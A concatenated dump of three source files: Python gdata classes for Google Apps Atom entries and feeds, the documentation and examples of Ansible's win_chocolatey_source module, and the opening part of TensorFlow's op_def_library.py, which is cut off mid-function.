class Nickname(atom.AtomBase):
"""The Google Apps Nickname element"""
_tag = 'nickname'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
def __init__(self, name=None,
extension_elements=None, extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NicknameFromString(xml_string):
return atom.CreateClassFromXMLString(Nickname, xml_string)
class NicknameEntry(gdata.GDataEntry):
"""A Google Apps flavor of an Atom Entry for Nickname"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}login' % APPS_NAMESPACE] = ('login', Login)
_children['{%s}nickname' % APPS_NAMESPACE] = ('nickname', Nickname)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
login=None, nickname=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.login = login
self.nickname = nickname
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NicknameEntryFromString(xml_string):
return atom.CreateClassFromXMLString(NicknameEntry, xml_string)
class NicknameFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps Nickname feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [NicknameEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def NicknameFeedFromString(xml_string):
return atom.CreateClassFromXMLString(NicknameFeed, xml_string)
class UserEntry(gdata.GDataEntry):
"""A Google Apps flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}login' % APPS_NAMESPACE] = ('login', Login)
_children['{%s}name' % APPS_NAMESPACE] = ('name', Name)
_children['{%s}quota' % APPS_NAMESPACE] = ('quota', Quota)
# This child may already be defined in GDataEntry, confirm before removing.
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feed_link',
[gdata.FeedLink])
_children['{%s}who' % gdata.GDATA_NAMESPACE] = ('who', Who)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
login=None, name=None, quota=None, who=None, feed_link=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.login = login
self.name = name
self.quota = quota
self.who = who
self.feed_link = feed_link or []
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def UserEntryFromString(xml_string):
return atom.CreateClassFromXMLString(UserEntry, xml_string)
class UserFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps User feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [UserEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def UserFeedFromString(xml_string):
return atom.CreateClassFromXMLString(UserFeed, xml_string)
class EmailListEntry(gdata.GDataEntry):
"""A Google Apps EmailList flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}emailList' % APPS_NAMESPACE] = ('email_list', EmailList)
# Might be able to remove this _children entry.
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feed_link',
[gdata.FeedLink])
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
email_list=None, feed_link=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.email_list = email_list
self.feed_link = feed_link or []
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListEntryFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListEntry, xml_string)
class EmailListFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps EmailList feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [EmailListEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def EmailListFeedFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListFeed, xml_string)
class EmailListRecipientEntry(gdata.GDataEntry):
"""A Google Apps EmailListRecipient flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}who' % gdata.GDATA_NAMESPACE] = ('who', Who)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
who=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.who = who
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListRecipientEntryFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListRecipientEntry, xml_string)
class EmailListRecipientFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps EmailListRecipient feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[EmailListRecipientEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def EmailListRecipientFeedFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListRecipientFeed, xml_string)
class Property(atom.AtomBase):
"""The Google Apps Property element"""
_tag = 'property'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
_attributes['value'] = 'value'
def __init__(self, name=None, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def PropertyFromString(xml_string):
return atom.CreateClassFromXMLString(Property, xml_string)
class PropertyEntry(gdata.GDataEntry):
"""A Google Apps Property flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}property' % APPS_NAMESPACE] = ('property', [Property])
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
property=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.property = property
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def PropertyEntryFromString(xml_string):
return atom.CreateClassFromXMLString(PropertyEntry, xml_string)
class PropertyFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps Property feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PropertyEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def PropertyFeedFromString(xml_string):
return atom.CreateClassFromXMLString(PropertyFeed, xml_string)
|
apache-2.0
|
richardcs/ansible
|
lib/ansible/modules/windows/win_chocolatey_source.py
|
28
|
3512
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_chocolatey_source
version_added: '2.7'
short_description: Manages Chocolatey sources
description:
- Used to manage Chocolatey sources configured on the client.
- Requires Chocolatey to be already installed on the remote host.
options:
admin_only:
description:
- Makes the source visible to Administrators only.
- Requires Chocolatey >= 0.10.8.
- When creating a new source, this defaults to C(False).
type: bool
allow_self_service:
description:
    - Allow the source to be used with self-service.
- Requires Chocolatey >= 0.10.4.
- When creating a new source, this defaults to C(False).
type: bool
bypass_proxy:
description:
- Bypass the proxy when using this source.
- Requires Chocolatey >= 0.10.4.
- When creating a new source, this defaults to C(False).
type: bool
certificate:
description:
- The path to a .pfx file to use for X509 authenticated feeds.
- Requires Chocolatey >= 0.9.10.
certificate_password:
description:
- The password for I(certificate) if required.
- Requires Chocolatey >= 0.9.10.
name:
description:
- The name of the source to configure.
required: yes
priority:
description:
- The priority order of this source compared to other sources, lower is
better.
- All priorities above C(0) will be evaluated first, then zero-based values
will be evaluated in config file order.
- Requires Chocolatey >= 0.9.9.9.
- When creating a new source, this defaults to C(0).
type: int
source:
description:
- The file/folder/url of the source.
- Required when I(state) is C(present) or C(disabled).
source_username:
description:
- The username used to access I(source).
source_password:
description:
- The password for I(source_username).
- Required if I(source_username) is set.
state:
description:
- When C(absent), will remove the source.
- When C(disabled), will ensure the source exists but is disabled.
- When C(present), will ensure the source exists and is enabled.
choices:
- absent
- disabled
- present
default: present
update_password:
description:
- When C(always), the module will always set the password and report a
change if I(certificate_password) or I(source_password) is set.
- When C(on_create), the module will only set the password if the source
is being created.
choices:
- always
- on_create
default: always
author:
- Jordan Borean (@jborean93)
'''
EXAMPLES = r'''
- name: remove the default public source
win_chocolatey_source:
name: chocolatey
state: absent
- name: add new internal source
win_chocolatey_source:
name: internal repo
state: present
source: http://chocolatey-server/chocolatey
- name: create HTTP source with credentials
win_chocolatey_source:
name: internal repo
state: present
source: https://chocolatey-server/chocolatey
source_username: username
source_password: password
- name: disable Chocolatey source
win_chocolatey_source:
    name: chocolatey
state: disabled
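# A sketch only (the feed URL and priority value are assumptions): pin an
# internal feed ahead of other sources using the priority option documented above.
- name: add internal source with an explicit priority
  win_chocolatey_source:
    name: internal repo
    state: present
    source: http://chocolatey-server/chocolatey
    priority: 1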
'''
RETURN = r'''
'''
|
gpl-3.0
|
gibiansky/tensorflow
|
tensorflow/python/framework/op_def_library.py
|
19
|
30843
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class to hold a library of OpDefs and use it to create Brain operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import six
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
def _Attr(op_def, name):
for attr in op_def.attr:
if attr.name == name:
return attr
raise TypeError("Inconsistent OpDef for '%s', missing attr '%s'" %
(op_def.name, name))
def _AttrValue(attr_protos, name):
if name in attr_protos:
return attr_protos[name]
raise TypeError("Inconsistent OpDef, missing attr '%s' from '%s'." %
(name, attr_protos))
def _SatisfiesTypeConstraint(dtype, attr_def, param_name):
if attr_def.HasField("allowed_values"):
allowed_list = attr_def.allowed_values.list.type
if dtype not in allowed_list:
raise TypeError(
"Value passed to parameter '%s' has DataType %s not in list of "
"allowed values: %s" %
(param_name, dtypes.as_dtype(dtype).name,
", ".join(dtypes.as_dtype(x).name for x in allowed_list)))
def _IsListParameter(arg):
if arg.number_attr:
return True
elif arg.type_list_attr:
return True
return False
def _NumTypeFields(arg):
num = 0
if arg.type != types_pb2.DT_INVALID: num += 1
if arg.type_attr: num += 1
if arg.type_list_attr: num += 1
return num
def _IsListValue(v):
return isinstance(v, (list, tuple))
def _Flatten(l):
"""Converts [1, 2, [3, 4], [5]] to [1, 2, 3, 4, 5]."""
# [1, 2, [3, 4], [5]] -> [[1], [2], [3, 4], [5]]
l_of_l = [x if _IsListValue(x) else [x] for x in l]
# [[1], [2], [3, 4], [5]] -> [1, 2, 3, 4, 5]
return [item for sublist in l_of_l for item in sublist]
def _Restructure(l, structure):
"""Returns the elements of list l structured according to the given structure.
A structure is represented by a list whose elements are either
`None` or a non-negative integer. `None` corresponds to a single
element in the output list, and an integer N corresponds to a nested
list of length N.
The function returns a data structure whose shape is given by
`structure`, and whose elements are taken from `l`. If `structure`
is a singleton, the function returns the single data structure
implied by the 0th element of `structure`. For example:
_Restructure(["foo", "bar", "baz", "qux"], [None, 2, None])
-> ["foo", ["bar", "baz"], "qux"]
_Restructure(["foo"], [None]) -> "foo"
_Restructure(["foo"], [1]) -> ["foo"]
_Restructure([], [0]) -> []
Args:
l: A list.
structure: A list whose elements are either `None` or a non-negative
integer.
Returns:
The elements of `l`, restructured according to `structure`. If
`structure` is a list of length 1, this function returns the
single data structure implied by `structure[0]`.
"""
result = []
current_index = 0
for element in structure:
if element is None:
result.append(l[current_index])
current_index += 1
else:
result.append(l[current_index:current_index+element])
current_index += element
if len(result) == 1:
return result[0]
else:
return tuple(result)
def _MakeFloat(v, arg_name):
if not isinstance(v, compat.real_types):
raise TypeError("Expected float for argument '%s' not %s." %
(arg_name, repr(v)))
return float(v)
def _MakeInt(v, arg_name):
if isinstance(v, six.string_types):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
try:
return int(v)
except (ValueError, TypeError):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
def _MakeStr(v, arg_name):
if not isinstance(v, compat.bytes_or_text_types):
raise TypeError("Expected string for argument '%s' not %s." %
(arg_name, repr(v)))
return compat.as_bytes(v) # Convert unicode strings to bytes.
def _MakeBool(v, arg_name):
if not isinstance(v, bool):
raise TypeError("Expected bool for argument '%s' not %s." %
(arg_name, repr(v)))
return v
def _MakeType(v, attr_def):
try:
v = dtypes.as_dtype(v).base_dtype
except TypeError:
raise TypeError("Expected DataType for argument '%s' not %s." %
(attr_def.name, repr(v)))
i = v.as_datatype_enum
_SatisfiesTypeConstraint(i, attr_def, param_name=attr_def.name)
return i
def _MakeShape(v, arg_name):
"""Convert v into a TensorShapeProto."""
# Args:
# v: A TensorShapeProto, a list of ints, or a tensor_shape.TensorShape.
# arg_name: String, for error messages.
# Returns:
# A TensorShapeProto.
if isinstance(v, tensor_shape_pb2.TensorShapeProto):
for d in v.dim:
if d.name:
logging.warning("Warning: TensorShapeProto with a named dimension: %s",
str(v))
break
return v
return tensor_shape.as_shape(v).as_proto()
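# For example (a sketch of the helper above): _MakeShape([2, 3], "shape")
# returns the same proto as tensor_shape.TensorShape([2, 3]).as_proto().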
def _MakeTensor(v, arg_name):
"""Ensure v is a TensorProto."""
if isinstance(v, tensor_pb2.TensorProto):
return v
raise TypeError(
"Don't know how to convert %s to a TensorProto for argument '%s'" %
(repr(v), arg_name))
class _OpInfo(object):
"""All per-Op state we would like to precompute/validate."""
def __init__(self, op_def):
self.op_def = op_def
# TODO(josh11b): SWIG the ValidateOpDef() function from C++ and call it
# here, instead of these checks.
for arg in list(op_def.input_arg) + list(op_def.output_arg):
num_type_fields = _NumTypeFields(arg)
if num_type_fields != 1:
raise TypeError("Arg '%s' of '%s' must have one type field not %d" %
(arg.name, op_def.name, num_type_fields))
if arg.type_attr:
attr_type = _Attr(op_def, arg.type_attr).type
if attr_type != "type":
raise TypeError("Attr '%s' of '%s' used as a type_attr "
"but has type %s" %
(arg.type_attr, op_def.name, attr_type))
if arg.type_list_attr:
attr_type = _Attr(op_def, arg.type_list_attr).type
if attr_type != "list(type)":
raise TypeError(
"Attr '%s' of '%s' used as a type_list_attr but has type %s" %
(arg.type_attr, op_def.name, attr_type))
if arg.number_attr:
attr_type = _Attr(op_def, arg.number_attr).type
if attr_type != "int":
raise TypeError(
"Attr '%s' of '%s' used as a number_attr but has type %s" %
(arg.number_attr, op_def.name, attr_type))
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def _MaybeColocateWith(inputs):
"""A context manager for (maybe) colocating with a list of input tensors.
Args:
inputs: A list of `Tensor` or `Operation` objects.
Returns:
A context manager.
"""
if not inputs:
yield
else:
# NOTE(mrry): The `ops.colocate_with()` function accepts only a single
# op or tensor, so we create one context manager per element in the list.
with ops.colocate_with(inputs[0]), _MaybeColocateWith(inputs[1:]):
yield
# pylint: enable=g-doc-return-or-yield
class OpDefLibrary(object):
"""Holds a collection of OpDefs, can add the corresponding Ops to a graph."""
def __init__(self):
self._ops = {}
def add_op(self, op_def):
"""Register an OpDef. May call apply_op with the name afterwards."""
if not isinstance(op_def, op_def_pb2.OpDef):
raise TypeError("%s is %s, not an op_def_pb2.OpDef" %
(op_def, type(op_def)))
if not op_def.name:
raise ValueError("%s missing name." % op_def)
if op_def.name in self._ops:
raise RuntimeError("Op name %s registered twice." % op_def.name)
self._ops[op_def.name] = _OpInfo(op_def)
def add_op_list(self, op_list):
"""Register the OpDefs from an OpList."""
if not isinstance(op_list, op_def_pb2.OpList):
raise TypeError("%s is %s, not an op_def_pb2.OpList" %
(op_list, type(op_list)))
for op_def in op_list.op:
self.add_op(op_def)
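  # Typical flow (a sketch; the OpList proto and the op/argument names are
  # hypothetical, nothing here is registered by this file itself):
  #
  #     op_lib = OpDefLibrary()
  #     op_lib.add_op_list(op_list_proto)   # an op_def_pb2.OpList instance
  #     out = op_lib.apply_op("MyOp", input1=a, name="my_node")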
def apply_op(self, op_type_name, name=None, **keywords):
# pylint: disable=g-doc-args
"""Add a node invoking a registered Op to a graph.
Example usage:
# input1 and input2 can be Tensors or anything ops.convert_to_tensor()
# will convert to a Tensor.
op_def_library.apply_op("op", input1=input1, input2=input2)
# Can specify a node name.
op_def_library.apply_op("op", input1=input1, name="node_name")
# Must use keyword arguments, with the names specified in the OpDef.
op_def_library.apply_op("op", input_name=input, attr_name=attr)
All attrs must either be inferred from an input or specified.
(If inferred, the attr must not be specified.) If an attr has a default
value specified in the Op's OpDef, then you may pass None as the value
of that attr to get the default.
Args:
op_type_name: string. Must match the name field of a registered Op.
name: string. Optional name of the created op.
**keywords: input Tensor and attr arguments specified by name,
and optional parameters to pass when constructing the Operation.
Returns:
The Tensor(s) representing the output of the operation, or the Operation
itself if there are no outputs.
Raises:
RuntimeError: On some errors.
TypeError: On some errors.
ValueError: On some errors.
"""
op_info = self._ops.get(op_type_name, None)
if op_info is None:
raise RuntimeError("Unrecognized Op name " + op_type_name)
op_def = op_info.op_def
# Determine the graph context.
try:
# Need to flatten all the arguments into a list.
# pylint: disable=protected-access
g = ops._get_graph_from_inputs(_Flatten(keywords.values()))
      # pylint: enable=protected-access
except AssertionError as e:
raise RuntimeError(
"Cannot determine graph for Op '%s' due to: %s"
% (op_type_name, e.message))
# Default name if not specified.
if name is None:
name = op_type_name
# Check for deprecation
deprecation_version = op_def.deprecation.version
if deprecation_version:
producer = g.graph_def_versions.producer
if producer >= deprecation_version:
raise NotImplementedError(
("Op %s is not available in GraphDef version %d. "
"It has been removed in version %d. %s.") %
(op_type_name, producer, deprecation_version,
op_def.deprecation.explanation))
# Fill in the list of default types for all "type" attrs. This
# will be used to choose a preferred dtype to convert to in the
# absence of input type information.
#
# TODO(b/31302892): Currently the defaults don't work in the right
# way if you have two inputs, one of whose type resolution depends
# on the other. Handling this will require restructuring this code
# significantly.
default_type_attr_map = {}
for attr_def in op_def.attr:
if attr_def.type != "type":
continue
key = attr_def.name
if attr_def.HasField("default_value"):
default_type_attr_map[key] = dtypes.as_dtype(
attr_def.default_value.type)
# Requires that op_def has passed validation (using the C++
# ValidateOpDef() from ../framework/op_def_util.h).
attrs = {}
inputs = []
input_types = []
with g.as_default(), ops.name_scope(name) as scope:
# Perform input type inference
inferred_from = {}
for input_arg in op_def.input_arg:
input_name = input_arg.name
if input_name in keywords:
values = keywords.pop(input_name)
elif input_name + "_" in keywords:
# Handle the case where the name is a keyword or built-in
# for Python so we use the name + _ instead.
input_name += "_"
values = keywords.pop(input_name)
else:
raise TypeError("No argument for input " + input_name)
# Goals:
# * Convert values to Tensors if it contains constants.
# * Verify that values is a list if that matches the input_arg's
# type.
# * If the input_arg's type is determined by attrs, either set
# those attrs and validate those attr values are legal (if
# they have not yet been set) or validate the input matches
# the type indicated by the attrs (if they have already been
# inferred via an earlier input).
# * If the input_arg has an explicit type, make sure the input
# conforms.
if _IsListParameter(input_arg):
if not _IsListValue(values):
raise TypeError(
"Expected list for '%s' argument to '%s' Op, not %s." %
(input_name, op_type_name, values))
# In cases where we expect all elements of the list to have the
# same dtype, try to cast non-Tensor elements to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.number_attr:
if input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
else:
for t in values:
if isinstance(t, ops.Tensor):
dtype = t.dtype
break
# dtype still not found, prefer using the default dtype
# from the attr.
if dtype is None and input_arg.type_attr in default_type_attr_map:
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
if not input_arg.is_ref and dtype:
dtype = dtypes.as_dtype(dtype).base_dtype
values = ops.internal_convert_n_to_tensor(
values,
name=input_arg.name,
dtype=dtype if dtype else None,
preferred_dtype=default_dtype,
as_ref=input_arg.is_ref)
if input_arg.number_attr and len(
set(v.dtype.base_dtype for v in values)) > 1:
raise TypeError() # All types should match.
except (TypeError, ValueError):
# What types does the conversion function think values have?
observed_types = []
for value in values:
try:
converted_value = ops.internal_convert_to_tensor(
value, as_ref=input_arg.is_ref)
observed_types.append(converted_value.dtype.base_dtype.name)
except (TypeError, ValueError):
observed_types.append("<NOT CONVERTIBLE TO TENSOR>")
observed = ", ".join(observed_types)
prefix = (
"Tensors in list passed to '%s' of '%s' Op have types [%s]" %
(input_name, op_type_name, observed))
if input_arg.number_attr:
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s that do not match expected type %s." %
(prefix, dtype.name))
elif input_arg.type_attr in attrs:
raise TypeError("%s that do not match type %s inferred from "
"earlier arguments." %
(prefix, dtype.name))
else:
raise TypeError("%s that don't all match." % prefix)
else:
raise TypeError("%s that are invalid." % prefix)
types = [x.dtype for x in values]
inputs.extend(values)
else:
# In cases where we have an expected type, try to convert non-Tensor
# arguments to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
elif input_arg.type_attr in default_type_attr_map:
          # The dtype could not be inferred solely from the inputs, so we
          # fall back to the attr's default; this keeps code that adds a
          # new attr with a default backwards compatible.
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
values = ops.internal_convert_to_tensor(
values,
name=input_arg.name,
dtype=dtype,
as_ref=input_arg.is_ref,
preferred_dtype=default_dtype)
except TypeError as err:
if dtype is None:
raise err
else:
raise TypeError(
"Expected %s passed to parameter '%s' of op '%s', got %s of "
"type '%s' instead." %
(dtypes.as_dtype(dtype).name, input_arg.name, op_type_name,
repr(values), type(values).__name__))
except ValueError:
# What type does convert_to_tensor think it has?
observed = ops.internal_convert_to_tensor(
values, as_ref=input_arg.is_ref).dtype.name
prefix = ("Input '%s' of '%s' Op has type %s that does not match" %
(input_name, op_type_name, observed))
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s expected type of %s." %
(prefix, dtypes.as_dtype(input_arg.type).name))
else:
# Update the maps with the default, if needed.
k = input_arg.type_attr
if k in default_type_attr_map:
if k not in attrs:
attrs[k] = default_type_attr_map[k]
if k not in inferred_from:
inferred_from[k] = "Default in OpDef"
raise TypeError(
"%s type %s of argument '%s'." %
(prefix, dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
types = [values.dtype]
inputs.append(values)
base_types = [x.base_dtype for x in types]
if input_arg.number_attr:
# <number-attr> * <type> or <number-attr> * <type-attr>
if input_arg.number_attr in attrs:
if len(values) != attrs[input_arg.number_attr]:
raise ValueError(
"List argument '%s' to '%s' Op with length %d must match "
"length %d of argument '%s'." %
(input_name, op_type_name, len(values),
attrs[input_arg.number_attr],
inferred_from[input_arg.number_attr]))
else:
attrs[input_arg.number_attr] = len(values)
inferred_from[input_arg.number_attr] = input_name
num_attr = _Attr(op_def, input_arg.number_attr)
if num_attr.has_minimum and len(values) < num_attr.minimum:
raise ValueError(
"List argument '%s' to '%s' Op with length %d shorter "
"than minimum length %d." %
(input_name, op_type_name, len(values), num_attr.minimum))
# All tensors must have the same base type.
if any([bt != base_types[0] for bt in base_types]):
raise TypeError(
"All tensors passed to '%s' of '%s' Op "
"must have the same type." %
(input_name, op_type_name))
if input_arg.type != types_pb2.DT_INVALID:
# <number-attr> * <type> case
if base_types and base_types[0] != input_arg.type:
assert False, "Unreachable"
elif input_arg.type_attr in attrs:
# <number-attr> * <type-attr> case, where <type-attr> already
# has an inferred value.
if base_types and base_types[0] != attrs[input_arg.type_attr]:
assert False, "Unreachable"
else:
# <number-attr> * <type-attr> case, where we are now setting
# the <type-attr> based on this input
if not base_types:
raise TypeError(
"Don't know how to infer type variable from empty input "
"list passed to input '%s' of '%s' Op." %
(input_name, op_type_name))
attrs[input_arg.type_attr] = base_types[0]
inferred_from[input_arg.type_attr] = input_name
type_attr = _Attr(op_def, input_arg.type_attr)
_SatisfiesTypeConstraint(base_types[0], type_attr,
param_name=input_name)
elif input_arg.type_attr:
# <type-attr>
attr_value = base_types[0]
if input_arg.type_attr in attrs:
if attrs[input_arg.type_attr] != attr_value:
assert False, "Unreachable"
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_attr),
param_name=input_name)
attrs[input_arg.type_attr] = attr_value
inferred_from[input_arg.type_attr] = input_name
elif input_arg.type_list_attr:
# <type-list-attr>
attr_value = base_types
if input_arg.type_list_attr in attrs:
if attrs[input_arg.type_list_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type list of %s that does not "
"match type list %s of argument '%s'." %
